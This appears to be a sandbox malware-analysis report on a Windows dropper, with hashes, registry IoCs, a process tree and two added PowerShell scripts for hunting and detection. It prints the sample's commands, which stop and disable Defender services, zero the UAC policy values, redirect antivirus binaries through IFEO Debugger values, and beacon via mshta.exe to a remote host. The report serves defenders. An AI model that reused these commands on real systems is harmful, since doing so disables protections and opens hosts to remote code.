Analysis
max time kernel: 150s
max time network: 123s
platform: windows7_x64
resource: win7-20240705-en
resource tags: arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
submitted: 23/08/2024, 07:17
The signatures, process tree and ATT&CK mapping on this page come from the Windows 7 x64 run (behavioral1); the Windows 10 run (behavioral2) is listed as a task only.
Static task: static1
Behavioral task: behavioral1
  Sample: bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe
  Resource: win7-20240705-en
Behavioral task: behavioral2
  Sample: bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe
  Resource: win10v2004-20240802-en
General
Target: bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe
Size: 2.2MB
MD5: bace3b705692dd51098d62cfab3e4c7a
SHA1: 709c80482b025237a006bb84101cfa3d1327c0e9
SHA256: 0f8478e87936627ba79b070ef5e433348b2b490f41409004651bf8127b197ff3
SHA512: 429b74ba446fff14365e57648b485d1513a69858fdd5627335a232fdffd76f2af122cc023a8b0eaf456a658fc2b605b920049bac2264af34ee724c3131aa4749
SSDEEP: 49152:CMGZ+nS10IELGTCb6bweJKFbC8PX8lD6qo9jTdpA4GkxDC:CySeIELGGbc0FbxI+q6TdpA4xpC
Malware Config
Extracted
http://softscoreinc.com/soft-usage/favicon.ico?0=1200&1=PSBQWFYT&2=i-s&3=225&4=7601&5=6&6=1&7=99600&8=1033
This is the URL that the dropped ynqonw.exe hands to mshta.exe (PID 2864 in the process tree). The numbered query parameters carry host details: 4=7601 is the Windows 7 SP1 build number and 8=1033 is the en-US locale identifier, both matching the sandbox image. The meaning of the other fields is not established by this report, so treat the host, path and the numbered-parameter shape as the indicator rather than the specific values.
Signatures
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\ynqonw.exe" | ynqonw.exe
The per-user Winlogon Shell value replaces explorer.exe as that user's shell, so the dropped executable is started at every logon without touching HKLM or a Run key.
UAC bypass (heading recovered from the process tree; the TTP and IoC counts did not survive extraction)
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | ynqonw.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | ynqonw.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" | ynqonw.exe
EnableLUA = 0 turns UAC off at the next reboot; ConsentPromptBehaviorAdmin = 0 lets administrators elevate without any prompt until then; ConsentPromptBehaviorUser = 0 makes elevation requests from standard users fail silently.
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 16 IoCs
description | ioc | Process
The 16 rows are two operations repeated for each of eight image names (msseces.exe, msascui.exe, msmpeng.exe, egui.exe, ekrn.exe, avastsvc.exe, avastui.exe, afwserv.exe):
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<image> | ynqonw.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<image>\Debugger = "svchost.exe" | ynqonw.exe
A Debugger value makes Windows start the named "debugger" with the original command line appended whenever that image is launched. Pointing it at svchost.exe means the Microsoft Security Essentials / Windows Defender (msseces, msascui, msmpeng), ESET (egui, ekrn) and Avast (avastsvc, avastui, afwserv) processes never actually run, and the technique survives a reboot.
Deletes itself 1 IoCs
pid | Process
2108 | cmd.exe
Executes dropped EXE 1 IoCs
pid | Process
2548 | ynqonw.exe
Loads dropped DLL 2 IoCs
pid | Process
2748 | bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe (2 events)
Checks whether UAC is enabled (heading recovered from the process tree; counts did not survive extraction)
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | ynqonw.exe
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Launches sc.exe 6 IoCs
sc.exe is the Windows utility that controls services on the system.
pid | Process
2740 | sc.exe
2140 | sc.exe
2892 | sc.exe
1424 | sc.exe
2188 | sc.exe
2384 | sc.exe
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | sc.exe (6 events), net.exe (2), net1.exe (2), cmd.exe, mshta.exe, bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe, ynqonw.exe
Reading NLS\Language is routine locale initialisation, which is why the stock sc.exe, net.exe, net1.exe, cmd.exe and mshta.exe all trigger this signature here; only the two sample binaries are worth a second look for it.
Modifies Internet Explorer settings (heading recovered from the process tree; counts did not survive extraction)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process
2548 | ynqonw.exe (64 events)
Suspicious use of AdjustPrivilegeToken 4 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2548 | ynqonw.exe (2 events)
Token: SeShutdownPrivilege | 2548 | ynqonw.exe (2 events)
SeDebugPrivilege fits the process enumeration above. SeShutdownPrivilege is worth noting next to EnableLUA = 0, which only takes effect after a reboot; whether the sample actually restarts the host is not shown in this run.
Suspicious use of FindShellTrayWindow 4 IoCs
pid | Process
2548 | ynqonw.exe (4 events)
Suspicious use of WriteProcessMemory 52 IoCs
description | pid | Process | procid_target
Each of the 13 parent/child pairs below was logged four times (52 rows). Every target is a direct child in the process tree, which is consistent with process creation rather than injection into a foreign process.
PID 2748 wrote to memory of 2740 | 2748 | bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe | 31
PID 2748 wrote to memory of 2140 | 2748 | bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe | 32
PID 2748 wrote to memory of 2860 | 2748 | bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe | 34
PID 2748 wrote to memory of 2892 | 2748 | bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe | 35
PID 2748 wrote to memory of 2548 | 2748 | bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe | 39
PID 2860 wrote to memory of 2604 | 2860 | net.exe | 40
PID 2748 wrote to memory of 2108 | 2748 | bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe | 41
PID 2548 wrote to memory of 1424 | 2548 | ynqonw.exe | 43
PID 2548 wrote to memory of 2384 | 2548 | ynqonw.exe | 44
PID 2548 wrote to memory of 2404 | 2548 | ynqonw.exe | 46
PID 2548 wrote to memory of 2188 | 2548 | ynqonw.exe | 48
PID 2404 wrote to memory of 2732 | 2404 | net.exe | 52
PID 2548 wrote to memory of 2864 | 2548 | ynqonw.exe | 51
System policy modification 1 TTPs 4 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | ynqonw.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | ynqonw.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | ynqonw.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" | ynqonw.exe
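The registry and service changes in the signatures above are the host artifacts a responder would sweep for on other machines. The PowerShell below is an added example written for this page, not sandbox output and not code from the sample. It assumes it runs elevated on the suspect host with PowerShell 3 or later, and it treats the dropped file name ynqonw.exe as variable between infections, so it checks the mechanisms (the Winlogon Shell value, the three UAC policy values, IFEO Debugger entries, the WinDefend and MsMpSvc services, executables in %APPDATA%\Microsoft) rather than that one name.

```powershell
# Added example (editor-written): hunt for the host artifacts listed in this report.
# Run elevated, PowerShell 3+. Findings are collected and printed at the end.
$findings = New-Object System.Collections.Generic.List[string]

# 1. Winlogon Shell: only explorer.exe is expected. The sample wrote a per-user value,
#    so check HKCU (current user) as well as the machine-wide key.
foreach ($key in 'HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon',
                 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon') {
    $shell = (Get-ItemProperty -Path $key -Name Shell -ErrorAction SilentlyContinue).Shell
    if ($shell -and ($shell.Trim() -ne 'explorer.exe')) {
        $findings.Add("Winlogon Shell overridden at $key : $shell")
    }
}

# 2. UAC policy values the sample zeroed. EnableLUA=0 disables UAC at next reboot,
#    ConsentPromptBehaviorAdmin=0 elevates administrators silently,
#    ConsentPromptBehaviorUser=0 auto-denies standard users.
$uacKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$uac = Get-ItemProperty -Path $uacKey -ErrorAction SilentlyContinue
foreach ($name in 'EnableLUA', 'ConsentPromptBehaviorAdmin', 'ConsentPromptBehaviorUser') {
    if ($null -ne $uac.$name -and [int]$uac.$name -eq 0) {
        $findings.Add("UAC policy weakened: $name = 0")
    }
}

# 3. IFEO Debugger values. Any Debugger value redirects launches of that image; the
#    sample pointed the security products' binaries at svchost.exe so they never start.
#    Legitimate debuggers (e.g. Visual Studio's JIT debugger) also live here, so the
#    list from the report is tagged and everything else is left for review.
$ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
$targetedByReport = 'msseces.exe', 'msascui.exe', 'msmpeng.exe', 'egui.exe', 'ekrn.exe',
                    'avastsvc.exe', 'avastui.exe', 'afwserv.exe'
Get-ChildItem -Path $ifeo -ErrorAction SilentlyContinue | ForEach-Object {
    $dbg = (Get-ItemProperty -Path $_.PSPath -Name Debugger -ErrorAction SilentlyContinue).Debugger
    if ($dbg) {
        $tag = if ($targetedByReport -contains $_.PSChildName) { 'matches report' } else { 'review' }
        $findings.Add("IFEO Debugger on $($_.PSChildName) = $dbg ($tag)")
    }
}

# 4. Security services the sample stopped and disabled. WinDefend is Windows Defender;
#    MsMpSvc is the Microsoft Security Essentials antimalware service on Windows 7.
Get-CimInstance -ClassName Win32_Service -Filter "Name='WinDefend' OR Name='MsMpSvc'" |
    ForEach-Object {
        if ($_.StartMode -eq 'Disabled' -or $_.State -ne 'Running') {
            $findings.Add("Service $($_.Name): StartMode=$($_.StartMode) State=$($_.State)")
        }
    }

# 5. The drop location. Only the directory is reliable; the file name (ynqonw.exe in
#    this run) is assumed to be generated per infection.
Get-ChildItem -Path (Join-Path $env:APPDATA 'Microsoft') -Filter '*.exe' -File -ErrorAction SilentlyContinue |
    ForEach-Object { $findings.Add("Executable in roaming profile: $($_.FullName)") }

if ($findings.Count -eq 0) { 'No artifacts from this report found.' } else { $findings }
```

The Shell check only covers the hive of the user running the script; to sweep other profiles, load each NTUSER.DAT with reg load and repeat the check against that hive. On a Windows 7 host still on PowerShell 2, replace Get-CimInstance with Get-WmiObject and drop the -File switch.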
Processes
The SysWOW64 paths show that the sample is a 32-bit image running under WOW64 on the x64 guest. The dropper disables the two security services, starts the dropped copy from the roaming profile, and then removes its own image from %TEMP% through cmd.exe using the 8.3 short name BACE3B~1.EXE; the dropped copy repeats the service-disabling commands and beacons with mshta.exe.
C:\Users\Admin\AppData\Local\Temp\bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe (PID 2748)
  Command line: "C:\Users\Admin\AppData\Local\Temp\bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe"
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\sc.exe (PID 2740)
    Command line: sc stop WinDefend
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
  C:\Windows\SysWOW64\sc.exe (PID 2140)
    Command line: sc config WinDefend start= disabled
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
  C:\Windows\SysWOW64\net.exe (PID 2860)
    Command line: net stop msmpsvc
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\net1.exe (PID 2604)
      Command line: C:\Windows\system32\net1 stop msmpsvc
      - System Location Discovery: System Language Discovery
  C:\Windows\SysWOW64\sc.exe (PID 2892)
    Command line: sc config msmpsvc start= disabled
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
  C:\Users\Admin\AppData\Roaming\Microsoft\ynqonw.exe (PID 2548)
    Command line: C:\Users\Admin\AppData\Roaming\Microsoft\ynqonw.exe
    - Modifies WinLogon for persistence
    - UAC bypass
    - Event Triggered Execution: Image File Execution Options Injection
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    - System policy modification
    C:\Windows\SysWOW64\sc.exe (PID 1424)
      Command line: sc stop WinDefend
      - Launches sc.exe
      - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\sc.exe (PID 2384)
      Command line: sc config WinDefend start= disabled
      - Launches sc.exe
      - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\net.exe (PID 2404)
      Command line: net stop msmpsvc
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\net1.exe (PID 2732)
        Command line: C:\Windows\system32\net1 stop msmpsvc
        - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\sc.exe (PID 2188)
      Command line: sc config msmpsvc start= disabled
      - Launches sc.exe
      - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\mshta.exe (PID 2864)
      Command line: mshta.exe "http://softscoreinc.com/soft-usage/favicon.ico?0=1200&1=PSBQWFYT&2=i-s&3=225&4=7601&5=6&6=1&7=99600&8=1033"
      - System Location Discovery: System Language Discovery
      - Modifies Internet Explorer settings
  C:\Windows\SysWOW64\cmd.exe (PID 2108)
    Command line: "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\BACE3B~1.EXE" >> NUL
    - Deletes itself
    - System Location Discovery: System Language Discovery
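The process tree is also a command-line pattern that can be matched in process-creation telemetry (Sysmon Event ID 1 or Security 4688). The script below is an added example for this page, not part of the report and not code from the sample. The event records are constructed here to mirror the tree, the field names Pid, Image, Parent and CommandLine are the example's own, and the regular expressions are written around the service names, tools and paths seen above; a site deploying this would add its own security products' service names.

```powershell
# Added example (editor-written): match the command lines from this report's process
# tree and correlate them per parent process.
function Test-ReportCommandLine {
    param(
        [Parameter(Mandatory)][string]$CommandLine,
        [string]$Image = ''
    )
    $hits = @()
    $cl = $CommandLine.Trim()
    # sc stop / sc config ... start= disabled against the two security services in the tree
    if ($cl -match '^"?(.*\\)?sc(\.exe)?"?\s+(stop|config)\s+(WinDefend|msmpsvc)\b') {
        $hits += 'impair-defenses: sc.exe against WinDefend/MsMpSvc (T1562.001)'
    }
    # net stop msmpsvc; net.exe hands off to net1.exe, so both images produce an event
    if ($cl -match '^"?(.*\\)?net1?(\.exe)?"?\s+stop\s+msmpsvc\b') {
        $hits += 'impair-defenses: net stop MsMpSvc (T1562.001)'
    }
    # mshta.exe given an http(s) URL: the beacon / remote script execution step
    if ($cl -match '^"?(.*\\)?mshta(\.exe)?"?\s+"?https?://') {
        $hits += 'mshta-url: mshta.exe with a remote URL (T1218.005)'
    }
    # cmd /c del of a file under %TEMP% with output thrown away: the self-deletion step
    if ($cl -match 'cmd(\.exe)?"?\s+/c\s+del\s+"?[^"]*\\AppData\\Local\\Temp\\[^"]+"?\s*>>?\s*NUL') {
        $hits += 'self-delete: cmd /c del of a %TEMP% file (T1070.004)'
    }
    # an executable running from %APPDATA%\Microsoft, where the sample dropped ynqonw.exe
    if ($Image -match '\\AppData\\Roaming\\Microsoft\\[^\\]+\.exe$') {
        $hits += 'appdata-exe: executable running from %APPDATA%\Microsoft'
    }
    return ,$hits
}

# Constructed records mirroring the process tree (not exported telemetry).
$dropper = 'C:\Users\Admin\AppData\Local\Temp\bace3b705692dd51098d62cfab3e4c7a_JaffaCakes118.exe'
$dropped = 'C:\Users\Admin\AppData\Roaming\Microsoft\ynqonw.exe'
$events = @(
    @{ Pid=2740; Image='C:\Windows\SysWOW64\sc.exe';    Parent=$dropper; CommandLine='sc stop WinDefend' }
    @{ Pid=2140; Image='C:\Windows\SysWOW64\sc.exe';    Parent=$dropper; CommandLine='sc config WinDefend start= disabled' }
    @{ Pid=2860; Image='C:\Windows\SysWOW64\net.exe';   Parent=$dropper; CommandLine='net stop msmpsvc' }
    @{ Pid=2604; Image='C:\Windows\SysWOW64\net1.exe';  Parent='C:\Windows\SysWOW64\net.exe'; CommandLine='C:\Windows\system32\net1 stop msmpsvc' }
    @{ Pid=2892; Image='C:\Windows\SysWOW64\sc.exe';    Parent=$dropper; CommandLine='sc config msmpsvc start= disabled' }
    @{ Pid=2548; Image=$dropped;                        Parent=$dropper; CommandLine=$dropped }
    @{ Pid=2864; Image='C:\Windows\SysWOW64\mshta.exe'; Parent=$dropped; CommandLine='mshta.exe "http://softscoreinc.com/soft-usage/favicon.ico?0=1200&1=PSBQWFYT&2=i-s&3=225&4=7601&5=6&6=1&7=99600&8=1033"' }
    @{ Pid=2108; Image='C:\Windows\SysWOW64\cmd.exe';   Parent=$dropper; CommandLine='"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\BACE3B~1.EXE" >> NUL' }
) | ForEach-Object { [pscustomobject]$_ }

# Per-event hits
foreach ($e in $events) {
    $h = Test-ReportCommandLine -CommandLine $e.CommandLine -Image $e.Image
    if ($h.Count -gt 0) { "PID $($e.Pid): $($h -join '; ')" }
}

# Correlation: one parent whose children cover two or more categories is this sample's
# pattern, not an administrator stopping a service once.
foreach ($g in ($events | Group-Object Parent)) {
    $cats = $g.Group |
        ForEach-Object { Test-ReportCommandLine -CommandLine $_.CommandLine -Image $_.Image } |
        ForEach-Object { ($_ -split ':')[0] } |
        Sort-Object -Unique
    if (@($cats).Count -ge 2) { "ALERT parent $($g.Name): $($cats -join ', ')" }
}
```

With the constructed records, every child of the dropper and of ynqonw.exe produces a hit, and the correlation step alerts on both parents (the dropper covers impair-defenses, self-delete and appdata-exe; ynqonw.exe covers impair-defenses and mshta-url) while the two net.exe parents, which only reach one category through net1.exe, do not. On real telemetry, key the grouping on the parent process GUID or PID rather than the parent image path.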
Network
MITRE ATT&CK Enterprise v15
Counts in parentheses are the number of matching signatures shown in the matrix.
Persistence
  Boot or Logon Autostart Execution (1): Winlogon Helper DLL (1)
  Create or Modify System Process (2): Windows Service (2)
  Event Triggered Execution (1): Image File Execution Options Injection (1)
Privilege Escalation
  Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
  Boot or Logon Autostart Execution (1): Winlogon Helper DLL (1)
  Create or Modify System Process (2): Windows Service (2)
  Event Triggered Execution (1): Image File Execution Options Injection (1)
Defense Evasion
  Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
  Impair Defenses (2): Disable or Modify Tools (1)
  Indicator Removal (1): File Deletion (1)
  Modify Registry (4)
Downloads
Filesize: 2.2MB
MD5: bace3b705692dd51098d62cfab3e4c7a
SHA1: 709c80482b025237a006bb84101cfa3d1327c0e9
SHA256: 0f8478e87936627ba79b070ef5e433348b2b490f41409004651bf8127b197ff3
SHA512: 429b74ba446fff14365e57648b485d1513a69858fdd5627335a232fdffd76f2af122cc023a8b0eaf456a658fc2b605b920049bac2264af34ee724c3131aa4749